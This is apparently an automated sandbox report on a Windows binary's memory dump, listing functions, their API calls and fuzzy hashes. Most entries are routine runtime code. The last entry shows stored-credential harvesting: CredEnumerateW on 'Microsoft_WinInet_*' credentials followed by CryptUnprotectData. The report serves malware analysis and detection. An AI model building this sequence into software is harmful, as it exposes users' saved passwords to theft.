Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92

Part of subcall function 004206DD: __EH_prolog.LIBCMT ref: 004206E2

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$GlobalH_prologInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID:
API String ID: 2888657697-0
Opcode ID: 9e2e020d0e772ffbecbe2351f0a6f25ea5963317bc3f9a4d56e27b3aa8109c9c
Instruction ID: cd57585f92f4651694f3437ef3a0fe2b6c7561e3377806dc9b6083a3b3dba577
Opcode Fuzzy Hash: 9e2e020d0e772ffbecbe2351f0a6f25ea5963317bc3f9a4d56e27b3aa8109c9c
Instruction Fuzzy Hash: 6B3189B1D04269EFCF04EFA6D591AEDFB70BF58308F60445EE40167242DB786A48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413886, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041388B

Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1

Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cd85b870158c6096764d1b2535d038e41bc92aeb01fe5351f8bb39a7c8a988db
Instruction ID: e0e9e3466cc930e456ed994cce60529752f33af2ff264595590bafee3097d804
Opcode Fuzzy Hash: cd85b870158c6096764d1b2535d038e41bc92aeb01fe5351f8bb39a7c8a988db
Instruction Fuzzy Hash: 70219DB1A013149FDB65DF69C88479ABBF0AF08304F0084AED50AA7792D775AE04CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0043E0F8, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,0043E75E,?,00004000), ref: 0043E163

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e8f0321b907f8c93eff9f9fe80aa9f9a4d2c7ab348c1fb85dc6ceb18b6bb5835
Instruction ID: b8c3acaed76ea71400faf53aace5318325b6ba4514e0b8ac76d2e751ebdd2552
Opcode Fuzzy Hash: e8f0321b907f8c93eff9f9fe80aa9f9a4d2c7ab348c1fb85dc6ceb18b6bb5835
Instruction Fuzzy Hash: 9B119A31601515FBDB05DF26C804A9ABBB9FF08764F10811AF86897250DB30FE61DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 00414D6C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 004090F5

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: d2e8f843bd8a4b25c813b3877dcae178226274afcf11ee46ceea94b2d4bbbaa1
Instruction ID: 251cd1cbde13bf4c341522c7ccce1db13cd85876ec4737e2f77db5c4961eba8a
Opcode Fuzzy Hash: d2e8f843bd8a4b25c813b3877dcae178226274afcf11ee46ceea94b2d4bbbaa1
Instruction Fuzzy Hash: 53F0447250020C67CB24BBA6D802C9FBB9C9E00368B50043FF90897242EB39DE0483DE

Uniqueness

Uniqueness Score: -1.00%

Function 0045A8FE, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0045A938

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 612a1abec5923c488ebb59fc330e05bb17ffe2dc4446500d9ec8559e1d33c293
Instruction ID: f3ba4f7996b305dadc24657f6488ca3712718daac0c1ff3c745a6b17617cb164
Opcode Fuzzy Hash: 612a1abec5923c488ebb59fc330e05bb17ffe2dc4446500d9ec8559e1d33c293
Instruction Fuzzy Hash: 8E1148B1A0420AAFCF05DF58E94198F7BF4EF48304F05406AF805EB352D634DA25CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043E9C5, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043E9CA

Part of subcall function 0043DBE2: CreateFileMappingA.KERNEL32 ref: 0043DC15

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFileH_prologMapping
String ID:
API String ID: 3367180550-0
Opcode ID: d64d4aa17e2adaf32635f94d8ef839382d33390163fd8f28caf12e903a2f28a7
Instruction ID: cc7c395e0eb8e052096abd9c2256c719d51126836da7d164bd1a85b90316bbdc
Opcode Fuzzy Hash: d64d4aa17e2adaf32635f94d8ef839382d33390163fd8f28caf12e903a2f28a7
Instruction Fuzzy Hash: 011170B0911B119FC3A0DF3AD80161ABAF4FF48710B10892FE19AD3B81E778A500CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFFF, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 8e2b376a1d5bd31ae04d1a7a932967fba1ec4f5808461264f66b7bb6ef01c9f2
Instruction ID: 941fd2b4e4699c03d34950e30c923efa3b28c70746c31d4bc35f3efe690fa374
Opcode Fuzzy Hash: 8e2b376a1d5bd31ae04d1a7a932967fba1ec4f5808461264f66b7bb6ef01c9f2
Instruction Fuzzy Hash: 4A01A7B0A04204AFDB348E14CC40BF23F99EB59358F34847BE005CD243D26ADDCB9A59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F06A, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(000000FF,00000244,00000000,00000000,00000000,?,0000FFFF,00000244,?,0041F292,00000001,00000000,?,00000000,00000244), ref: 0041F090

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: acaac340ea075798355b7a76716ac3f8d807ef000a523cb7dba276451aed9ca5
Instruction ID: b2856fa76417eeaae25239adddc27ac655f403bf8eafa223ee5e10a7ae46ea81
Opcode Fuzzy Hash: acaac340ea075798355b7a76716ac3f8d807ef000a523cb7dba276451aed9ca5
Instruction Fuzzy Hash: 3D019E31600105BFE708CF19D881AA6BBB9FB84304F04822AE40587651E3B1BD948BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00445166, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f874ddcf992f3c3c6c59b5b3d98718a30df31dcc146f703c06fc5feda4c2f9c5
Instruction ID: 13684ca19e7c19ffe86e0d6c3d5b9d4de08ff2cfd1c634039dab65eabff4720b
Opcode Fuzzy Hash: f874ddcf992f3c3c6c59b5b3d98718a30df31dcc146f703c06fc5feda4c2f9c5
Instruction Fuzzy Hash: CEF0A932901E1457EE31666A9C05B5B32989F42379F25071FFD24922D3DF7CE80A869E

Uniqueness

Uniqueness Score: -1.00%

Function 00420568, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042056D

Part of subcall function 0041FCB2: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
Part of subcall function 0041FCB2: _strlen.LIBCMT ref: 0041FCD8

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectoryH_prolog_strlen
String ID:
API String ID: 1906034785-0
Opcode ID: 2e11c9215a7ba952f10d9dec40afdaeaee524692f695b28bfd3b63b049fecccb
Instruction ID: 8f4f766da947a39cfd01fa68859b9d028871f64d1bddd01dbdfe974dcb1ef4d4
Opcode Fuzzy Hash: 2e11c9215a7ba952f10d9dec40afdaeaee524692f695b28bfd3b63b049fecccb
Instruction Fuzzy Hash: BA01AC71611702AFD3449F399C857AABAE8FF45324F10432FE025D72D2DB789941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA9C, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AAA1

Part of subcall function 0040A9DC: __EH_prolog.LIBCMT ref: 0040A9E1
Part of subcall function 0040A9DC: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$___std_fs_directory_iterator_open@12
String ID:
API String ID: 1512400408-0
Opcode ID: b559db8ff5c56a8f67874d0cfc07117f73eac39842f714beab7192a8586eefe9
Instruction ID: e377c236dd62adbf3a3ef1934febb3bb85398013c8040f262c9f5580056daf97
Opcode Fuzzy Hash: b559db8ff5c56a8f67874d0cfc07117f73eac39842f714beab7192a8586eefe9
Instruction Fuzzy Hash: EE0161719057059FCB28DF69819069FBBF4AF04314F10462FE49693381D7745A44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00454FBC, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 0045850D: HeapAlloc.KERNEL32(00000008,?,00000000,?,0045736D,00000001,00000364,00000008,000000FF,?,004401D2,?,?,00414650,?), ref: 0045854E

_free.LIBCMT ref: 00454FDC

Part of subcall function 00457FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?), ref: 00457FF9
Part of subcall function 00457FE3: GetLastError.KERNEL32(?,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?,?), ref: 0045800B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocErrorFreeLast_free
String ID:
API String ID: 3091179305-0
Opcode ID: fc5169e07c96bd685d5387a54b4fcf998bad6721f73858e685e1c4f565c3509c
Instruction ID: 7054d58e949489bd53ac7515c0275a745f1ea6e52b1439f5ae7ec5743b7d0c3c
Opcode Fuzzy Hash: fc5169e07c96bd685d5387a54b4fcf998bad6721f73858e685e1c4f565c3509c
Instruction Fuzzy Hash: 330108B6D00219AFCB10DFA9D841A9EBBB8FB48710F10422AE914E7241E774AA44CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00464160, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004641C3

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a94c1e8ed22497acdbef1ba1fd8e7d8ffb3c70f8b820077d0e9993faea048f79
Instruction ID: 027a2c0be38452a1ce383e2f5702291adaac393c38664a96b0ec204eb3fac7d3
Opcode Fuzzy Hash: a94c1e8ed22497acdbef1ba1fd8e7d8ffb3c70f8b820077d0e9993faea048f79
Instruction Fuzzy Hash: B9018F72C04119BFCF01AFA88C059EE7FB5BF48314F14416AFD14E21A1E6358A60DB85

Uniqueness

Uniqueness Score: -1.00%

Function 004129C7, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004129CC

Part of subcall function 00413DA4: __EH_prolog.LIBCMT ref: 00413DA9
Part of subcall function 00413DA4: std::_Lockit::_Lockit.LIBCPMT ref: 00413DB7
Part of subcall function 00413DA4: int.LIBCPMT ref: 00413DCE
Part of subcall function 00413DA4: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E1E

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1350124489-0
Opcode ID: 461c48fe403ac9d440876e6ec101c94ff546250139541d0ad5f7d4e8eeb681a4
Instruction ID: c434b697f8c53097445019a40e5bb927d44771b075c49f0c0e8e2ea380da5454
Opcode Fuzzy Hash: 461c48fe403ac9d440876e6ec101c94ff546250139541d0ad5f7d4e8eeb681a4
Instruction Fuzzy Hash: 8701A771A20110DFD755EB55CA05BEE73E4EF08705F00402EB405E7292DBB8EE50CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004097F7, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004097FC

Part of subcall function 004095E7: __EH_prolog.LIBCMT ref: 004095EC
Part of subcall function 004095E7: std::_Lockit::_Lockit.LIBCPMT ref: 004095FC
Part of subcall function 004095E7: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00409639

Part of subcall function 004097C4: __Getctype.LIBCPMT ref: 004097DF

Part of subcall function 0040965D: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040967A
Part of subcall function 0040965D: std::_Lockit::~_Lockit.LIBCPMT ref: 004096EB

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$H_prologLocinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID:
API String ID: 1713013424-0
Opcode ID: 126b824393f1d5c09ec2e37a766e3d0c38e17aaa221827c77816a57a47541a28
Instruction ID: 4af4f7efd611e0bbd4d6de8c50925f7526f85ecdfeb6d4872c78a751e4295838
Opcode Fuzzy Hash: 126b824393f1d5c09ec2e37a766e3d0c38e17aaa221827c77816a57a47541a28
Instruction Fuzzy Hash: 1DF09673510215ABDB15BF59C852B9E77B4AF50B14F10802FF405B72C2DB785D04C689

Uniqueness

Uniqueness Score: -1.00%

Function 0040A981, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040A99A

Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindNext___std_fs_directory_iterator_advance@8
String ID:
API String ID: 3878998205-0
Opcode ID: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
Instruction ID: 786aef3f6954a22798eff1a87afa34900a3c8d969515b4c2b0423792bc31befd
Opcode Fuzzy Hash: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
Instruction Fuzzy Hash: A3F0E97131070457EB346626CD4577BB3A8AF80315F010C7FA981F31C1E6B8AC50855E

Uniqueness

Uniqueness Score: -1.00%

Function 0045918E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: be8b65e2839ea773a393bfd8d8c218399c99b2fc238a0e1b1befe52690129737
Instruction ID: 56f4cfcb82363ac18a679079ea8552777963f317c6836842f6b813f2b54360bc
Opcode Fuzzy Hash: be8b65e2839ea773a393bfd8d8c218399c99b2fc238a0e1b1befe52690129737
Instruction Fuzzy Hash: BAE0A035100A33E6BA2126669C0875B3A49DB023A6F1D0527AC0592783DB28CC0985ED

Uniqueness

Uniqueness Score: -1.00%

Function 00413383, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413388

Part of subcall function 004133DB: __EH_prolog.LIBCMT ref: 004133E0
Part of subcall function 004133DB: std::locale::_Init.LIBCPMT ref: 00413428

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Initstd::locale::_
String ID:
API String ID: 1266419734-0
Opcode ID: aea23e5e1c7f26d8b6fa45439ab9ea0fcc52410a705ac5c81f8be841db386ccb
Instruction ID: 1e5ba366b068d9671d529f87e40a12a47e3df1e068544780cfa82af07c9af5b4
Opcode Fuzzy Hash: aea23e5e1c7f26d8b6fa45439ab9ea0fcc52410a705ac5c81f8be841db386ccb
Instruction Fuzzy Hash: F8F0B7B5A146159FC719CF08C485D6ABBE4EB18304B00C55EA45AC7301D7B4ED41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00413514, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413519

Part of subcall function 004135BF: __EH_prolog.LIBCMT ref: 004135C4
Part of subcall function 004135BF: std::_Lockit::_Lockit.LIBCPMT ref: 004135D2
Part of subcall function 004135BF: int.LIBCPMT ref: 004135E9
Part of subcall function 004135BF: std::_Lockit::~_Lockit.LIBCPMT ref: 00413639

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1350124489-0
Opcode ID: 86f554fc3e761d6b0629a781467418c1c630e79fbf77a7c9fdcbf34a710f5886
Instruction ID: a8e4e32ddfe87f030bc516392fbfca3139fd5d07fbf71dfdd4908f6783b08c68
Opcode Fuzzy Hash: 86f554fc3e761d6b0629a781467418c1c630e79fbf77a7c9fdcbf34a710f5886
Instruction Fuzzy Hash: DCF05E75A10104EFCB04EF54C595AADB7F5FF48304F10815EE4069B352DB79EA08CA29

Uniqueness

Uniqueness Score: -1.00%

Function 0040A676, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 0040A67D

Part of subcall function 0040A2D4: __EH_prolog.LIBCMT ref: 0040A2D9

Part of subcall function 004432AB: RaiseException.KERNEL32(E06D7363,00000001,00000003,004090EB,?,?,?,004090EB,?,004853BC), ref: 0044330B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionH_prologH_prolog2Raise
String ID:
API String ID: 1276564762-0
Opcode ID: 36bd0a6d51c30f5aaee7f12d015ed4c203fc98ff88eba013819a30f97302d903
Instruction ID: 6cdaae375658fcdab4018d469116dcf97d3cd22aaeaeab6f728bc95c36adb6c4
Opcode Fuzzy Hash: 36bd0a6d51c30f5aaee7f12d015ed4c203fc98ff88eba013819a30f97302d903
Instruction Fuzzy Hash: 64F08C31910118BADB10FBA1CC4AFDE7B38BF04308F1480AAB144B70D1EB38AA08CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC66, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 004137E4: __EH_prolog.LIBCMT ref: 004137E9

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ff9861f27f77417ab95cbd856b44cfd1abc938c40735cdb2f78bd95fff57564d
Instruction ID: 7b56fd564ee5dba22c1b256a7910ee9a5b5d76db5c36e8c87beafa9b19ca48cc
Opcode Fuzzy Hash: ff9861f27f77417ab95cbd856b44cfd1abc938c40735cdb2f78bd95fff57564d
Instruction Fuzzy Hash: 27E06DB1A247159BCB14DF68C80168AB6E4EB58758B10C93FA445E3340E778DA008788

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF03, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00413886: __EH_prolog.LIBCMT ref: 0041388B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a7b9227a42579bb225a77cb24e2b44158b2e34b4692b9aa13c7cae12d2ffbd39
Instruction ID: 6095d6418412deed06a35367cec5ea556f7f2b94be48555c84b2d961f3d52009
Opcode Fuzzy Hash: a7b9227a42579bb225a77cb24e2b44158b2e34b4692b9aa13c7cae12d2ffbd39
Instruction Fuzzy Hash: 37E06DB2A257159BCB18DF68C80168A76E4EB18758B10C93FB445E3300E778DA008788

Uniqueness

Uniqueness Score: -1.00%

Function 0041C85C, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 3384b426e82c27c2a47a6d85146d74305314438c6090d0b0504518bf9fdadea9
Instruction ID: 45e9017656f6a52bd7424a5e16e4d09d4cc10a3c4bd0a25d5d33bb1e2e1ad873
Opcode Fuzzy Hash: 3384b426e82c27c2a47a6d85146d74305314438c6090d0b0504518bf9fdadea9
Instruction Fuzzy Hash: 64E08C310042008BFB388E14E1007A673E1EB02318F60094EE085C6690C7A9AC849698

Uniqueness

Uniqueness Score: -1.00%

Function 0043F433, Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 8880be27594fe1dc46eab3789d79d605a080d5e10a8aa48689f371cbc42518ee
Instruction ID: 558cf98cde0a510390d68fe92a3eaff0fba5e2f9fa2b07517afb1c2e6d705b46
Opcode Fuzzy Hash: 8880be27594fe1dc46eab3789d79d605a080d5e10a8aa48689f371cbc42518ee
Instruction Fuzzy Hash: 7FD0C9B6501118BFFA012B959C05CF7BB9CEF197A1B009022FE44CA011D5729D1097B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041C959, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

___std_fs_set_current_path@4.LIBCPMT ref: 0041C967

Part of subcall function 0040A676: __EH_prolog2.LIBCMT ref: 0040A67D

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog2___std_fs_set_current_path@4
String ID:
API String ID: 2482923176-0
Opcode ID: 6d17d1cff17333b9a7c79be5ad3722d5f535a8e865ce86925c57640275841327
Instruction ID: 0a86e6c55615681b0d0e75044d596b77bbb09aa8d0d1ee6bb9c17a49818965c4
Opcode Fuzzy Hash: 6d17d1cff17333b9a7c79be5ad3722d5f535a8e865ce86925c57640275841327
Instruction Fuzzy Hash: A6C01270A72B2043CA24656DBD488C751DD5F0F709710887FB881D3604D578CD8546EC

Uniqueness

Uniqueness Score: -1.00%

Function 00412F2D, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: bab91838952b0afba9ecd6327a2e78b788cf83c2b43cd94e1ce8009139a163fe
Instruction ID: 10cf1057b39a453f28e862301a9428c92d1bb2c0edcf9b409483b8ecb0c5bb88
Opcode Fuzzy Hash: bab91838952b0afba9ecd6327a2e78b788cf83c2b43cd94e1ce8009139a163fe
Instruction Fuzzy Hash: D0D05E310046008FF3349E08F1017A277E5EB01314F20094EE0D5C6591C7A95CC4879D

Uniqueness

Uniqueness Score: -1.00%

Function 00463EA7, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e37b2f97575dc0254c26ad9aa3f0fa52951ac1588ed93c35a03c0d82901148c
Instruction ID: 1683f18ab777b9f427d836d21452a745f8e35c4b12b45357bacd302cc903320f
Opcode Fuzzy Hash: 7e37b2f97575dc0254c26ad9aa3f0fa52951ac1588ed93c35a03c0d82901148c
Instruction Fuzzy Hash: 28D06C3210010DBBDF128F94DC06EDA3BAAFB4C714F018050FA1856020C772E821AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00435DD0, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00435DEB

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b5ee8a5701466d33f9cbc78514380c3bbbdd93b9be7c2a415b78b77fc25f71fa
Instruction ID: 6223cfaa72ab82669a20bc440cf7149b8fb7925aead8d04b015655650725991c
Opcode Fuzzy Hash: b5ee8a5701466d33f9cbc78514380c3bbbdd93b9be7c2a415b78b77fc25f71fa
Instruction Fuzzy Hash: 93D0C974D0810DEBCF50DB90D949AC9B7BCAB04308F0004A294C1E3140EAF4ABCA9B91

Uniqueness

Uniqueness Score: -1.00%

Function 00445A55, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445A68

Part of subcall function 00457FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?), ref: 00457FF9
Part of subcall function 00457FE3: GetLastError.KERNEL32(?,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?,?), ref: 0045800B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: e604c8a294d64a0052e12ad6042e8ff2da1b84093215c4a0307e54f67f5992e0
Instruction ID: 22d6937be2526dc59ff857a35040620ee46eab35b37312ddff15c65259e4e18c
Opcode Fuzzy Hash: e604c8a294d64a0052e12ad6042e8ff2da1b84093215c4a0307e54f67f5992e0
Instruction Fuzzy Hash: ACC04C72504208BBDB05DB46D90AE4E7BA9DB80368F204059F81557251DAB5EF449694

Uniqueness

Uniqueness Score: -1.00%

Function 0042A869, Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0042A878

Part of subcall function 0042A224: CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244

Part of subcall function 0042A130: lstrlenW.KERNEL32(?), ref: 0042A156
Part of subcall function 0042A130: lstrlenW.KERNEL32(00000002), ref: 0042A167
Part of subcall function 0042A130: CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
Part of subcall function 0042A130: CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
Part of subcall function 0042A130: LocalFree.KERNEL32(?), ref: 0042A200
Part of subcall function 0042A130: CredFree.ADVAPI32(?), ref: 0042A219

Part of subcall function 0042A2F9: GetVersionExW.KERNEL32(?), ref: 0042A341
Part of subcall function 0042A2F9: LoadLibraryA.KERNEL32(?), ref: 0042A395
